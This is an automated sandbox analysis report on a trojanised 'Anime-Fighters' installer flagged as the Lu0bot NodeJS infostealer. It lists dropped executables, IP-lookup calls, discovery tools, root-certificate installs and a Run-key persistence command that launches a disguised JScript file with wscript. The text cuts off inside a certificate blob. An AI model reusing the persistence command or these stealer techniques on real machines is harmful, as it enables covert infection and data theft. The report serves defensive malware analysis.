lu0bot | c91c6c4c1162115c8d7f82f2d9f4098ee61fbe9051d3350b0a2f97fa2ce3e6f2

Resubmissions

02-09-2021 19:12

210902-xwla1aeefq 10

02-09-2021 19:09

210902-xtsbjabea9 8

Analysis

max time kernel
599s
max time network
644s
platform
windows7_x64
resource
win7v20210408
submitted
02-09-2021 19:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Anime-Fighters-Infin_734316524.exe
Size

3.9MB
MD5

bd2b73492acf20dec004360b1605032d
SHA1

60ddf3c107d94bbeb102a2d7ede945eb5edd2b35
SHA256

12b6272825140a15eabec58f97b49aed3ce5db7816a0b3c2674f6ae8746367ca
SHA512

dae236259e32a9e4b789f020dbd8082b376e3c2b56fd94523a44cf4b5a557f3661aeefc24b5605218ba0479ee1b9a8cb7b5c1df6c103673a99f13bc4210c90da

Score

10^/10

lu0bot discovery persistence stealer suricata trojan

Malware Config

Signatures

Lu0bot
Lu0bot is a lightweight infostealer written in NodeJS.
trojan stealer lu0bot
suricata: ET MALWARE lu0bot Loader HTTP Request
suricata: ET MALWARE lu0bot Loader HTTP Request
suricata
suricata: ET MALWARE lu0bot Loader HTTP Response
suricata: ET MALWARE lu0bot Loader HTTP Response
suricata

Blocklisted process makes network request 64 IoCs

Processes:

MsiExec.exemshta.execscript.exe

flow	pid	process
31	288	MsiExec.exe
34	288	MsiExec.exe
35	996	mshta.exe
36	288	MsiExec.exe
37	2180	cscript.exe
39	288	MsiExec.exe
41	288	MsiExec.exe
43	288	MsiExec.exe
45	288	MsiExec.exe
46	288	MsiExec.exe
47	288	MsiExec.exe
48	288	MsiExec.exe
49	288	MsiExec.exe
50	288	MsiExec.exe
54	288	MsiExec.exe
55	288	MsiExec.exe
56	288	MsiExec.exe
57	288	MsiExec.exe
58	288	MsiExec.exe
59	288	MsiExec.exe
60	288	MsiExec.exe
61	288	MsiExec.exe
62	288	MsiExec.exe
64	288	MsiExec.exe
65	288	MsiExec.exe
68	288	MsiExec.exe
69	288	MsiExec.exe
72	288	MsiExec.exe
73	288	MsiExec.exe
77	288	MsiExec.exe
80	288	MsiExec.exe
81	288	MsiExec.exe
82	288	MsiExec.exe
83	288	MsiExec.exe
84	288	MsiExec.exe
85	288	MsiExec.exe
86	288	MsiExec.exe
87	288	MsiExec.exe
88	288	MsiExec.exe
89	288	MsiExec.exe
90	288	MsiExec.exe
91	288	MsiExec.exe
92	288	MsiExec.exe
93	288	MsiExec.exe
94	288	MsiExec.exe
95	288	MsiExec.exe
96	288	MsiExec.exe
97	288	MsiExec.exe
98	288	MsiExec.exe
99	288	MsiExec.exe
100	288	MsiExec.exe
101	288	MsiExec.exe
102	288	MsiExec.exe
103	288	MsiExec.exe
104	288	MsiExec.exe
105	288	MsiExec.exe
106	288	MsiExec.exe
107	288	MsiExec.exe
108	288	MsiExec.exe
109	288	MsiExec.exe
110	288	MsiExec.exe
111	288	MsiExec.exe
112	288	MsiExec.exe
113	288	MsiExec.exe

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

Processes:

Anime-Fighters-Infin_734316524.tmpExpedita.exe4k3pJuomY9ufA5v.exe5TbjRG.exe52225395540.exenode.exe26650786599.exeGarbage Cleaner.exeGarbage Cleaner.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exe

pid	process
1864	Anime-Fighters-Infin_734316524.tmp
1748	Expedita.exe
1360	4k3pJuomY9ufA5v.exe
1268	5TbjRG.exe
1972	52225395540.exe
2436	node.exe
2656	26650786599.exe
2716	Garbage Cleaner.exe
3032	Garbage Cleaner.exe
544	AdvancedWindowsManager.exe
2588	AdvancedWindowsManager.exe
2620	AdvancedWindowsManager.exe
4044	AdvancedWindowsManager.exe
2152	AdvancedWindowsManager.exe
4220	AdvancedWindowsManager.exe

Loads dropped DLL 56 IoCs

Processes:

Anime-Fighters-Infin_734316524.exeAnime-Fighters-Infin_734316524.tmpExpedita.exe5TbjRG.exeMsiExec.exeMsiExec.exeMsiExec.execmd.execscript.execmd.execmd.exe4k3pJuomY9ufA5v.exeGarbage Cleaner.exetaskeng.exe

pid	process
1988	Anime-Fighters-Infin_734316524.exe
1864	Anime-Fighters-Infin_734316524.tmp
1864	Anime-Fighters-Infin_734316524.tmp
1864	Anime-Fighters-Infin_734316524.tmp
1864	Anime-Fighters-Infin_734316524.tmp
1748	Expedita.exe
1748	Expedita.exe
1748	Expedita.exe
1268	5TbjRG.exe
1268	5TbjRG.exe
1268	5TbjRG.exe
1564	MsiExec.exe
1564	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
1268	5TbjRG.exe
288	MsiExec.exe
288	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1384	cmd.exe
1648	MsiExec.exe
1384	cmd.exe
288	MsiExec.exe
2380	cscript.exe
2628	cmd.exe
2628	cmd.exe
2688	cmd.exe
1360	4k3pJuomY9ufA5v.exe
3032	Garbage Cleaner.exe
3032	Garbage Cleaner.exe
1584	taskeng.exe
1584	taskeng.exe
1584	taskeng.exe
1584	taskeng.exe
2572
1584	taskeng.exe
2064
1584	taskeng.exe
1384
1584	taskeng.exe
4188
1584	taskeng.exe
4212
4232

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exe

pid process

2584 icacls.exe
6992 icacls.exe

pid	process
2584	icacls.exe
6992	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Intel Management Engine Components 537220114 = "wscript.exe /t:30 /nologo /e:jscript \"C:\\ProgramData\\Intel\\Intel(R) Management Engine Components\\Intel MEC 1582787339\" \"C:\\ProgramData\\Intel\\Intel(R) Management Engine Components\" 1516268563"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe5TbjRG.exe

description	ioc	process
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	5TbjRG.exe
File opened (read-only)	\??\O:	5TbjRG.exe
File opened (read-only)	\??\T:	5TbjRG.exe
File opened (read-only)	\??\W:	5TbjRG.exe
File opened (read-only)	\??\R:	5TbjRG.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\E:	5TbjRG.exe
File opened (read-only)	\??\H:	5TbjRG.exe
File opened (read-only)	\??\I:	5TbjRG.exe
File opened (read-only)	\??\K:	5TbjRG.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	5TbjRG.exe
File opened (read-only)	\??\Q:	5TbjRG.exe
File opened (read-only)	\??\Y:	5TbjRG.exe
File opened (read-only)	\??\Z:	5TbjRG.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	5TbjRG.exe
File opened (read-only)	\??\U:	5TbjRG.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	5TbjRG.exe
File opened (read-only)	\??\P:	5TbjRG.exe
File opened (read-only)	\??\S:	5TbjRG.exe
File opened (read-only)	\??\V:	5TbjRG.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	5TbjRG.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	5TbjRG.exe
File opened (read-only)	\??\L:	5TbjRG.exe
File opened (read-only)	\??\N:	5TbjRG.exe
File opened (read-only)	\??\X:	5TbjRG.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

480 ipinfo.io
140 whatismyip.akamai.com
190 ipinfo.io
198 ip-api.com
215 ip-api.com
217 ip-api.com
253 ipinfo.io
Suspicious use of SetThreadContext 1 IoCs

Processes:

Garbage Cleaner.exe

description pid process target process

PID 2716 set thread context of 3032 2716 Garbage Cleaner.exe Garbage Cleaner.exe

flow	ioc
480	ipinfo.io
140	whatismyip.akamai.com
190	ipinfo.io
198	ip-api.com
215	ip-api.com
217	ip-api.com
253	ipinfo.io

description	pid	process	target process
PID 2716 set thread context of 3032	2716	Garbage Cleaner.exe	Garbage Cleaner.exe

Drops file in Program Files directory 22 IoCs

Processes:

Anime-Fighters-Infin_734316524.tmpmsiexec.exe

description	ioc	process
File created	C:\Program Files (x86)\Vel\unins000.dat	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\voluptas\is-5AFS5.tmp	Anime-Fighters-Infin_734316524.tmp
File opened for modification	C:\Program Files (x86)\Vel\unins000.dat	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\Vel\is-239LL.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-L58BB.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-DRN7E.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-2OJN4.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\Vel\voluptas\is-U45I1.tmp	Anime-Fighters-Infin_734316524.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files (x86)\Vel\is-VQFME.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\is-6D7AM.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-PLL4J.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-JJ4LS.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-82E0O.tmp	Anime-Fighters-Infin_734316524.tmp
File opened for modification	C:\Program Files (x86)\Vel\magnam\Expedita.exe	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\is-J0CFU.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-9TBDE.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe

Drops file in Windows directory 32 IoCs

Processes:

msiexec.exeexpand.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI2850.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC16.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\f760437.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI24D2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f760437.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC74.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID40.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1418.tmp	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Installer\MSI81E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1139.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI12C0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI21C3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2540.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI25DD.tmp	msiexec.exe
File created	C:\Windows\Installer\f760439.msi	msiexec.exe
File created	C:\Windows\Installer\f760435.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB59.tmp	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Installer\MSIDAE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI267A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2406.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f760435.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI204A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI203A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2359.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF26.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

node.exe26650786599.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	26650786599.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	26650786599.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	node.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

2164 tasklist.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

netstat.exeipconfig.exe

pid process

2360 netstat.exe
1608 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2212 systeminfo.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1892 taskkill.exe
2784 taskkill.exe

pid	process
2164	tasklist.exe

pid	process
2360	netstat.exe
1608	ipconfig.exe

pid	process
2212	systeminfo.exe

pid	process
1892	taskkill.exe
2784	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

msiexec.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe

Modifies registry class 24 IoCs

Processes:

msiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

7056 reg.exe
7068 reg.exe

pid	process
7056	reg.exe
7068	reg.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Expedita.exe5TbjRG.exeGarbage Cleaner.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Expedita.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Expedita.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	5TbjRG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Garbage Cleaner.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d